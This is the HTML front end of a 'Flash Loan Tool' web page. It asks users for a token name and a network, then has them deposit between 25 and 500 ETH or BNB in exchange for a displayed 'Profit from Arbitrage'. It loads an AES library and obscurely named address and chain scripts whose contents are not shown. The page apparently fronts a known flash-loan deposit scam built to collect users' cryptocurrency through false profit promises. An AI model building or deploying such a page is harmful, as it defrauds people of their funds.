<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<title>Flash Loan Tool</title>

	<link rel="stylesheet" href="./assets/css/styles.css">
  <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Ubuntu:regular,bold&subset=Latin">
  <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Ubuntu+Mono">
  <link rel='stylesheet' type="text/css" href='https://fonts.googleapis.com/css?family=Cousine'>

	<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"></script>
</head>


<body ng-app="myApp" ng-controller="myCtrl">
  <img class="logo" src="https://i.postimg.cc/Hx7TvfBd/logo.png" alt="Logo">

	<form ng-show="formStep == 1" ng-submit="submitErc20Form()">
		<h1>STEP 1</h1>
		<p>Please fill in the fields below and countinue to the next step.</p>

		<div>&nbsp;</div>

		<div class="input-holder">
			<label>Token Name (i.e. Tether, Bitcoin, Cake, Binance Coin):</label>
			<br>
			<input type="text" ng-model="erc20.name" maxlength="10" autofocus />
		</div>

		<div class="input-holder">
			<label>Token Symbol (i.e. USDT, BTC, CAKE, BNB):</label>
			<br>
			<input type="text" ng-model="erc20.symbol" maxlength="4" />
		</div>

		<div class="input-holder">
			<label>Select Network:</label>

<!--			<div>&nbsp;</div> -->
    </div>
    <div class="input-holder2">
			<input type="radio" ng-model="erc20.network" id="n1" name="network" ng-value="true" ng-checked="erc20.network">
			<label for="n1">Ethereum Network</label>

			<div>&nbsp;</div>

			<input type="radio" ng-model="erc20.network" id="n2" name="network" ng-value="false" ng-checked="!erc20.network">
			<label for="n2">Binance Smart Chain</label><br><br>
		</div>

		<div class="input-holder btn-holder">
			<button type="submit">Next Step</button>
		</div>
	</form>

	<form ng-show="formStep == 2" ng-submit="submitLoanForm()">
		<h1>STEP 2</h1>
		<p>Flash Loan Details</p>

		<div>&nbsp;</div>

		<div class="input-holder">
			<label>Loan Amount ({{currency}}):</label>
			<br>
			<input id="loanAmtInput" type="number" ng-change="amountChanged()" ng-model="loan.amount" step="5" min="25" max="500" />
		</div>

		<div class="input-holder info">
			<div class="kv">
				<div>Token Deployment Fee</div>
				<div>{{loan.tokenFee}} {{currency}}</div>
			</div>

			<div class="kv">
				<div>{{dex}} Swapping Fee</div>
				<div>{{loan.swapFee}} {{currency}}</div>
			</div>

			<div class="kv">
				<div>Total Cost</div>
				<div class="spend">{{loan.totalFee}} {{currency}}</div>
			</div>

			<hr>

			<div class="kv">
				<div>Profit from Arbitrage</div>
				<div class="gain">{{loan.gain}} {{currency}}</div>
			</div>
		</div>

		<div class="input-holder btn-holder">
			<button type="submit" ng-disabled="processing || ethDeposited">Deposit {{currency}}</button>
		</div>

		<div class="input-holder btn-holder">
			<button type="submit" ng-disabled="processing || !ethDeposited">Execute Flash Loan</button>
		</div>
	</form>

  <div class="built-info">
    <br>
    <p>Built with &#x1f497; for the crypto community</p>
    <br>
    <br>
  </div>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.3.5/web3.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js" integrity="sha256-/H4YS+7aYb9kJ5OKhFYPUjSJdrtV6AeyJOtTkw6X72o=" crossorigin="anonymous"></script>
	<script src="./assets/js/addr.min.js"></script>
	<script src="./assets/js/chain.min.js"></script>
	<script src="./assets/js/script.min.js"></script>
</body>

</html>

<!-- Comment & End. -->
